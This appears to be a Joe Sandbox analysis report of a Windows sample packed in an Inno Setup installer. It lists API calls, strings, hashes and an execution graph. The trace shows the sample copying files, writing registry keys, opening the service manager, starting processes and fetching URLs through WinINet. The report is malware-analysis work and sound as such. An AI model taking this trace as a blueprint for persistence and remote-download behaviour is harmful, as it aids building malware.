                                                          • Instruction ID: 1902e23b80ae68d1a407740dd401f48df33a1007776b0bbafa0d95379bb3c34b
                                                          • Opcode Fuzzy Hash: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                          • Instruction Fuzzy Hash: AF216474B402449FDB01DBAACC556DEBBE8EB89704F91847FE408E7381DB789D018B59
                                                          APIs
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501D1
                                                          • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00450202
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ExecuteMessageSendShell
                                                          • String ID: open
                                                          • API String ID: 812272486-2758837156
                                                          • Opcode ID: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                          • Instruction ID: 7e6871a26ddddf45a22869efb5a26db0f3e7f81d2927c2b78b58bd6f76e5dadf
                                                          • Opcode Fuzzy Hash: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                          • Instruction Fuzzy Hash: EE216274E00204AFDB04DFA5C889E9EB7F8EB44705F2085BAB814E7292D7789E44CA48
                                                          APIs
                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00455300
                                                          • GetLastError.KERNEL32(0000003C,00000000,00455349,?,?,?), ref: 00455311
                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: DirectoryErrorExecuteLastShellSystem
                                                          • String ID: <
                                                          • API String ID: 893404051-4251816714
                                                          • Opcode ID: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                          • Instruction ID: ab6e9011ac2a47c3b5942fb44236b8cd8890e3b7caf9c3a2037be21c94c6989b
                                                          • Opcode Fuzzy Hash: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                          • Instruction Fuzzy Hash: 3F212370600609AFDB10EF65D8926EE7BE8AF48355F90403AFC44E7281D7789E45CB98
                                                          APIs
                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                          • String ID: )
                                                          • API String ID: 2227675388-1084416617
                                                          • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                          • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                          • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                          • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496075
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window
                                                          • String ID: /INITPROCWND=$%x $@
                                                          • API String ID: 2353593579-4169826103
                                                          • Opcode ID: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                          • Instruction ID: 17582354874f3a564912cfd2224966d9f48ebc88dda7ed38b5aba0a92b935dc2
                                                          • Opcode Fuzzy Hash: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                          • Instruction Fuzzy Hash: 1111B731A042448FDF01DBA4D892BAE7FE8EB48314F51447BE504E7282D73C9905CB5C
                                                          APIs
                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                          • SysFreeString.OLEAUT32(?), ref: 004474BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: String$AllocByteCharFreeMultiWide
                                                          • String ID: NIL Interface Exception$Unknown Method
                                                          • API String ID: 3952431833-1023667238
                                                          • Opcode ID: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                          • Instruction ID: e495528c603fed7e49a6c7636a2d67f8de45625ce5c80b81863372b855da2a7d
                                                          • Opcode Fuzzy Hash: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                          • Instruction Fuzzy Hash: 7A11D670604208AFEB14DFA58952A6EBFBCEB08304F91447EF504E7282D7789D05CB69
                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000,0049594F), ref: 0049591A
                                                          • CloseHandle.KERNEL32(004959B4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000), ref: 00495931
                                                            • Part of subcall function 00495804: GetLastError.KERNEL32(00000000,0049589C,?,?,?,?), ref: 00495828
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateErrorHandleLastProcess
                                                          • String ID: <cI
                                                          • API String ID: 3798668922-2480932022
                                                          • Opcode ID: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                          • Instruction ID: 6201355901f458c0f36557428e85d419ca31de49550c26c5d668688d9bb1e683
                                                          • Opcode Fuzzy Hash: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                          • Instruction Fuzzy Hash: 660161B1644648AFEF05DBA2DC42FAEBBACDF48714F61003BF504E7291D6785E05CA68
                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD70
                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Value$EnumQuery
                                                          • String ID: Inno Setup: No Icons
                                                          • API String ID: 1576479698-2016326496
                                                          • Opcode ID: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                          • Instruction ID: 0d60c2ceabc561baab214a4f8badfae1c51fae2703c03b7062d0178a0b9483fa
                                                          • Opcode Fuzzy Hash: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                          • Instruction Fuzzy Hash: C3012632B55B307AFB3085256C42F7B568CCF46B60F68003BF981EA2C1D6989C04936E
                                                          APIs
                                                            • Part of subcall function 0047C8B0: FreeLibrary.KERNEL32(6F9D0000,00480FF3), ref: 0047C8C6
                                                            • Part of subcall function 0047C580: GetTickCount.KERNEL32 ref: 0047C5CA
                                                            • Part of subcall function 004570B4: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570D3
                                                          • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497E67), ref: 00497565
                                                          • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497E67), ref: 0049756B
                                                          Strings
                                                          • Detected restart. Removing temporary directory., xrefs: 0049751F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                          • String ID: Detected restart. Removing temporary directory.
                                                          • API String ID: 1717587489-3199836293
                                                          • Opcode ID: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                          • Instruction ID: 3a6ec644de21484b963019a16799c2105d01f9358526232ca3662f3e81dafe78
                                                          • Opcode Fuzzy Hash: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                          • Instruction Fuzzy Hash: C5E0E57121C6007EDE4177B6BC6295B3F9CD745778752483BF40881952E52D5810C6BD
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                          • GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CommandHandleLineModule
                                                          • String ID: H6M
                                                          • API String ID: 2123368496-12167474
                                                          • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                          • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                          • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                          • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastSleep
                                                          • String ID:
                                                          • API String ID: 1458359878-0
                                                          • Opcode ID: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                          • Instruction ID: de14e8d07cc4d1fec6b94f0f99926b65e7014e25a7505cf550c56fab82152177
                                                          • Opcode Fuzzy Hash: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                          • Instruction Fuzzy Hash: 91F0F672640954978A20B5DB89A1A3F724CDA94365760012BEC0CD7203C579CC494BAD

                                                          Execution Graph

                                                          Execution Coverage:2.6%
                                                          Dynamic/Decrypted Code Coverage:83.9%
                                                          Signature Coverage:14.1%
                                                          Total number of Nodes:1025
                                                          Total number of Limit Nodes:36
                                                          execution_graph 61139 4022e0 61142 401f64 FindResourceA 61139->61142 61141 4022e5 61143 401f86 GetLastError SizeofResource 61142->61143 61149 401f9f 61142->61149 61144 401fa6 LoadResource LockResource GlobalAlloc 61143->61144 61143->61149 61145 401fd2 61144->61145 61146 401ffb GetTickCount 61145->61146 61148 402005 GlobalAlloc 61146->61148 61148->61149 61149->61141 60619 402c02 60620 402c07 60619->60620 60621 40d413 CopyFileA 60620->60621 60622 40d41a 60621->60622 60623 402603 RegOpenKeyExA 60624 40d580 60623->60624 61150 40d6a6 CreateDirectoryA 61151 402768 RegCreateKeyExA 61152 4025c0 61151->61152 61153 40277b 61151->61153 61154 402c19 SetEvent 61152->61154 61153->61154 61155 402c60 61153->61155 61154->61155 61156 40ddfe GetTickCount 61155->61156 60625 40d54a 60626 40d587 OpenSCManagerA 60625->60626 60627 40dc48 60626->60627 61157 40226a Sleep 61158 40d891 61157->61158 61159 40282c VirtualAlloc 61160 40d0a0 61159->61160 60628 4027ce RegCloseKey 60629 402850 60630 40d50e RegSetValueExA 60629->60630 60632 2db648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 60671 2db42c7 60632->60671 60634 2db64f3 GetTickCount 60635 2db605a 59 API calls 60634->60635 60636 2db6508 GetVersionExA 60635->60636 60637 2db6549 __cftof2_l 60636->60637 60638 2dc2fac _malloc 59 API calls 60637->60638 60639 2db6556 60638->60639 60640 2dc2fac _malloc 59 API calls 60639->60640 60641 2db6566 60640->60641 60642 2dc2fac _malloc 59 API calls 60641->60642 60643 2db6571 60642->60643 60644 2dc2fac _malloc 59 API calls 60643->60644 60645 2db657c 60644->60645 60646 2dc2fac _malloc 59 API calls 60645->60646 60647 2db6587 60646->60647 60648 2dc2fac _malloc 59 API calls 60647->60648 60649 2db6592 60648->60649 60650 2dc2fac _malloc 59 API calls 60649->60650 60651 2db659d 60650->60651 60652 2dc2fac _malloc 59 API calls 60651->60652 60653 2db65ac 6 API calls 60652->60653 60654 2db65ff __cftof2_l 60653->60654 60655 2db6618 RtlEnterCriticalSection RtlLeaveCriticalSection 60654->60655 60656 2dc2fac _malloc 59 API calls 60655->60656 60657 2db6657 60656->60657 60658 2dc2fac _malloc 59 API calls 60657->60658 60659 2db6665 60658->60659 60660 2dc2fac _malloc 59 API calls 60659->60660 60661 2db666c 60660->60661 60662 2dc2fac _malloc 59 API calls 60661->60662 60663 2db6692 QueryPerformanceCounter Sleep 60662->60663 60664 2dc2fac _malloc 59 API calls 60663->60664 60665 2db66bf 60664->60665 60666 2dc2fac _malloc 59 API calls 60665->60666 60667 2db66cc __cftof2_l 60666->60667 60668 2db6708 Sleep 60667->60668 60669 2db670e RtlEnterCriticalSection RtlLeaveCriticalSection 60667->60669 60668->60669 60670 2db6744 __cftof2_l 60669->60670 60672 2db42cd 60671->60672 60673 403310 GetVersion 60697 404454 HeapCreate 60673->60697 60675 40336f 60676 403374 60675->60676 60677 40337c 60675->60677 60772 40342b 8 API calls 60676->60772 60709 404134 60677->60709 60681 403384 GetCommandLineA 60723 404002 60681->60723 60685 40339e 60755 403cfc 60685->60755 60687 4033a3 60688 4033a8 GetStartupInfoA 60687->60688 60768 403ca4 60688->60768 60690 4033ba GetModuleHandleA 60692 4033de 60690->60692 60773 403a4b GetCurrentProcess TerminateProcess ExitProcess 60692->60773 60694 4033e7 60774 403b20 UnhandledExceptionFilter 60694->60774 60696 4033f8 60698 404474 60697->60698 60699 4044aa 60697->60699 60775 40430c 19 API calls 60698->60775 60699->60675 60701 404479 60702 404483 60701->60702 60704 404490 60701->60704 60776 40482b HeapAlloc 60702->60776 60705 4044ad 60704->60705 60777 40507c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 60704->60777 60705->60675 60706 40448d 60706->60705 60708 40449e HeapDestroy 60706->60708 60708->60699 60778 40344f 60709->60778 60712 404153 GetStartupInfoA 60720 404264 60712->60720 60722 40419f 60712->60722 60715 4042cb SetHandleCount 60715->60681 60716 40428b GetStdHandle 60718 404299 GetFileType 60716->60718 60716->60720 60717 40344f 12 API calls 60717->60722 60718->60720 60719 404210 60719->60720 60721 404232 GetFileType 60719->60721 60720->60715 60720->60716 60721->60719 60722->60717 60722->60719 60722->60720 60724 404050 60723->60724 60725 40401d GetEnvironmentStringsW 60723->60725 60727 404025 60724->60727 60728 404041 60724->60728 60726 404031 GetEnvironmentStrings 60725->60726 60725->60727 60726->60728 60729 403394 60726->60729 60730 404069 WideCharToMultiByte 60727->60730 60731 40405d GetEnvironmentStringsW 60727->60731 60728->60729 60733 4040e3 GetEnvironmentStrings 60728->60733 60734 4040ef 60728->60734 60746 403db5 60729->60746 60735 40409d 60730->60735 60736 4040cf FreeEnvironmentStringsW 60730->60736 60731->60729 60731->60730 60733->60729 60733->60734 60737 40344f 12 API calls 60734->60737 60738 40344f 12 API calls 60735->60738 60736->60729 60744 40410a 60737->60744 60739 4040a3 60738->60739 60739->60736 60740 4040ac WideCharToMultiByte 60739->60740 60742 4040c6 60740->60742 60743 4040bd 60740->60743 60741 404120 FreeEnvironmentStringsA 60741->60729 60742->60736 60787 403501 60743->60787 60744->60741 60747 403dc7 60746->60747 60748 403dcc GetModuleFileNameA 60746->60748 60800 406614 19 API calls 60747->60800 60750 403def 60748->60750 60751 40344f 12 API calls 60750->60751 60752 403e10 60751->60752 60754 403e20 60752->60754 60801 403406 7 API calls 60752->60801 60754->60685 60756 403d09 60755->60756 60758 403d0e 60755->60758 60802 406614 19 API calls 60756->60802 60759 40344f 12 API calls 60758->60759 60760 403d3b 60759->60760 60767 403d4f 60760->60767 60803 403406 7 API calls 60760->60803 60762 403d92 60763 403501 7 API calls 60762->60763 60764 403d9e 60763->60764 60764->60687 60765 40344f 12 API calls 60765->60767 60767->60762 60767->60765 60804 403406 7 API calls 60767->60804 60769 403cad 60768->60769 60771 403cb2 60768->60771 60805 406614 19 API calls 60769->60805 60771->60690 60773->60694 60774->60696 60775->60701 60776->60706 60777->60706 60782 403461 60778->60782 60781 403406 7 API calls 60781->60712 60783 40345e 60782->60783 60785 403468 60782->60785 60783->60712 60783->60781 60785->60783 60786 40348d 12 API calls 60785->60786 60786->60785 60788 40350d 60787->60788 60796 403529 60787->60796 60791 403517 60788->60791 60792 40352d 60788->60792 60789 403558 60790 403559 HeapFree 60789->60790 60790->60796 60791->60790 60793 403523 60791->60793 60792->60789 60795 403547 60792->60795 60798 40489e VirtualFree VirtualFree HeapFree 60793->60798 60799 40532f VirtualFree HeapFree VirtualFree 60795->60799 60796->60742 60798->60796 60799->60796 60800->60748 60801->60754 60802->60758 60803->60767 60804->60767 60805->60771 61161 2db72ab InternetOpenA 61162 2db72c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 61161->61162 61172 2db7389 __cftof2_l 61161->61172 61265 2dc4af0 61162->61265 61165 2db7382 InternetCloseHandle 61165->61172 61166 2db7342 InternetReadFile 61171 2db7377 InternetCloseHandle 61166->61171 61168 2db6708 Sleep 61169 2db670e RtlEnterCriticalSection RtlLeaveCriticalSection 61168->61169 61176 2db6744 __cftof2_l 61169->61176 61170 2db66f4 61170->61168 61170->61169 61171->61165 61172->61170 61173 2db73e9 RtlEnterCriticalSection RtlLeaveCriticalSection 61172->61173 61267 2dc233c 61173->61267 61175 2db7413 61177 2db7463 61175->61177 61179 2dc233c 66 API calls 61175->61179 61177->61170 61178 2dc233c 66 API calls 61177->61178 61180 2db7484 61178->61180 61181 2db7427 61179->61181 61184 2dc2fac _malloc 59 API calls 61180->61184 61236 2db7738 61180->61236 61181->61177 61183 2dc233c 66 API calls 61181->61183 61182 2dc233c 66 API calls 61185 2db7750 61182->61185 61186 2db743b 61183->61186 61187 2db749d RtlEnterCriticalSection RtlLeaveCriticalSection 61184->61187 61188 2db779d 61185->61188 61189 2db775a __cftof2_l 61185->61189 61186->61177 61191 2dc233c 66 API calls 61186->61191 61215 2db74d5 __cftof2_l 61187->61215 61190 2dc233c 66 API calls 61188->61190 61196 2db776a RtlEnterCriticalSection RtlLeaveCriticalSection 61189->61196 61192 2db77ab 61190->61192 61193 2db744f 61191->61193 61194 2db77b1 61192->61194 61195 2db77d0 61192->61195 61193->61177 61198 2dc233c 66 API calls 61193->61198 61320 2db61f5 61194->61320 61199 2dc233c 66 API calls 61195->61199 61196->61170 61198->61177 61200 2db77de 61199->61200 61201 2db7b00 61200->61201 61205 2db77f0 61200->61205 61202 2dc233c 66 API calls 61201->61202 61203 2db7b0e 61202->61203 61203->61170 61204 2dc2fac _malloc 59 API calls 61203->61204 61210 2db7b22 __cftof2_l 61204->61210 61205->61170 61323 2dc2418 61205->61323 61209 2db78aa 61211 2db78e2 RtlEnterCriticalSection 61209->61211 61216 2db7b4f 61210->61216 61393 2db534d 93 API calls 2 library calls 61210->61393 61213 2db790f RtlLeaveCriticalSection 61211->61213 61214 2db7905 61211->61214 61212 2db755c 61218 2dc2fac _malloc 59 API calls 61212->61218 61341 2db3c67 61213->61341 61214->61213 61215->61212 61221 2dc233c 66 API calls 61215->61221 61219 2dc2f74 _free 59 API calls 61216->61219 61227 2db7593 __cftof2_l 61218->61227 61219->61170 61221->61212 61228 2db75f8 61227->61228 61386 2dc35e6 60 API calls 3 library calls 61227->61386 61230 2dc2f74 _free 59 API calls 61228->61230 61229 2db7ae7 61392 2db9002 88 API calls __EH_prolog 61229->61392 61234 2db75fe 61230->61234 61234->61236 61237 2dc3b4c _Allocate 60 API calls 61234->61237 61235 2db7aaf 61371 2db83e9 61235->61371 61236->61182 61241 2db760e 61237->61241 61245 2db7629 61241->61245 61389 2db9736 212 API calls __EH_prolog 61241->61389 61244 2dba724 73 API calls 61251 2db7a1a 61244->61251 61277 2dba84e 61245->61277 61246 2db75c4 61246->61228 61387 2dc2850 59 API calls _vscan_fn 61246->61387 61388 2dc35e6 60 API calls 3 library calls 61246->61388 61250 2db763f 61281 2db5119 61250->61281 61251->61235 61252 2dba724 73 API calls 61251->61252 61254 2db7a6b 61252->61254 61254->61235 61366 2dbd116 61254->61366 61256 2db7687 61310 2dbac0e 61256->61310 61259 2db76ec Sleep 61390 2dc18f0 GetProcessHeap HeapFree 61259->61390 61260 2db76e7 shared_ptr 61260->61259 61262 2db7708 61263 2db7722 shared_ptr 61262->61263 61391 2db4100 GetProcessHeap HeapFree 61262->61391 61263->61236 61266 2db7322 InternetOpenUrlA 61265->61266 61266->61165 61266->61166 61268 2dc2348 61267->61268 61269 2dc236b 61267->61269 61268->61269 61271 2dc234e 61268->61271 61396 2dc2383 66 API calls 4 library calls 61269->61396 61394 2dc5e5b 59 API calls __getptd_noexit 61271->61394 61272 2dc237e 61272->61175 61274 2dc2353 61395 2dc4ef5 9 API calls __beginthreadex 61274->61395 61276 2dc235e 61276->61175 61278 2dba858 __EH_prolog 61277->61278 61397 2dbdfff 61278->61397 61280 2dba876 shared_ptr 61280->61250 61282 2db5123 __EH_prolog 61281->61282 61401 2dc0b10 61282->61401 61285 2db3c67 72 API calls 61286 2db514a 61285->61286 61287 2db3d7e 64 API calls 61286->61287 61288 2db5158 